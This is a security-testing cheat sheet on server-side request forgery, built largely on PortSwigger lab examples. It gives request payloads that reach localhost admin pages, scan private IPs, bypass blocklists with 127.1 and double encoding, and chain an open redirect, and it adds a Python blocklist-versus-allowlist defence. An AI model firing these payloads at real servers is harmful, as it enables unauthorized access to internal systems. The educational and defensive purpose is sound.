Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.
- Testing for Server-Side Request Forgery (OWASP, WSTG-INPV-19)
- Server-Side Request Forgery Prevention Cheat Sheet (OWASP)
- Server-side request forgery (SSRF) (PortSwigger)
- Evasion techniques (HackTricks)
- SVG SSRFs and saga of bypasses (InfoSec Writeups)
- Cloud SSRF (HackTricks)
A vulnerability description for reporting is available in VulnDB (GitHub).
Use the URL validation bypass cheat sheet (PortSwigger)!
Testing SSRF
Basic SSRF
POST /product/stock HTTP/1.0
...
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1
Accessing localhost
POST /product/stock HTTP/1.1
...
stockApi=http://localhost/admin
Accessing another back-end system
Send the request to the Intruder module and make the IP address the varying part to scan the network for port 8080.
POST /product/stock HTTP/1.1
...
stockApi=http://<PRIVATE IP>:8080
SSRF with blacklist-based input filter
Example from the PortSwigger Web Security Academy labs – Server-side request forgery (SSRF): use 127.1 to bypass a filter on localhost, and use double URL encoding (with Hackvertor) to bypass a restriction on “admin”.
POST /product/stock HTTP/1.1
...
stockApi=http%3A%2F%2F127.1/<@replace('%','%25')><@urlencode_all>admin/<@/urlencode_all><@/replace>
SSRF with filter bypass via open redirection vulnerability
Example: if you find an Open Redirect vulnerability, chain it with the SSRF to reach the internal admin interface.
POST /product/stock HTTP/1.1
...
stockApi=<@urlencode>/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin<@/urlencode>
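The two bypasses above (127.1 plus double encoding, and an open redirect) both defeat string-matching blocklists. Below, as an added example that is not from this cheat sheet or from PortSwigger, a naive blocklist is placed next to an allowlist-and-resolve check; the hostname stock.weliketoshop.net is taken from the first request on this page, and the injectable resolver stub is an assumption made so the code runs offline.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

# The kind of substring blocklist that the 127.1 / double-encoding tricks above defeat.
BLOCKED_SUBSTRINGS = ("localhost", "127.0.0.1", "admin")

def naive_filter_allows(url: str) -> bool:
    """Blocklist check: only matches the literal strings, so 127.1 and %2561dmin slip through."""
    lowered = url.lower()
    return not any(bad in lowered for bad in BLOCKED_SUBSTRINGS)

def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %2561dmin is seen as 'admin'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def hardened_allows(url: str, allowed_hosts, resolve=socket.getaddrinfo) -> bool:
    """Allowlist the host, then refuse anything that resolves to a non-public address.

    `resolve` defaults to the real resolver; the test passes a stub (assumption for offline use).
    """
    parts = urlsplit(fully_decode(url))
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    # Allowlist instead of blocklist: 127.1, 0x7f000001, [::1] etc. are simply not listed.
    if parts.hostname not in allowed_hosts:
        return False
    try:
        addrs = {ipaddress.ip_address(info[4][0]) for info in resolve(parts.hostname, None)}
    except (socket.gaierror, ValueError):
        return False
    # Reject loopback, RFC 1918, link-local (169.254.169.254 cloud metadata) and unspecified.
    return bool(addrs) and all(addr.is_global for addr in addrs)
```

The open-redirect chain only works when the fetching client follows the redirect, so the server-side fetch should be made with redirects disabled and every Location header re-checked with the same allowlist before it is followed.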
Blind SSRF with out-of-band detection
Try injecting the Burp Collaborator URL into the Referer HTTP header value, then check in Burp Collaborator whether a request is received.
Referer: https://<BURP COLLABORATOR ID>.oastify.com/
- Install the Collaborator Everywhere extension for Burp Suite.
- Add the target to Burp Suite’s target scope, so that Collaborator Everywhere will target it.
- Navigate the webapp.
- In the Target tab, new issues will be created for the vulnerable URL, for example:
- Collaborator Pingback (HTTP): Referer
- Collaborator Pingback (HTTP): User-Agent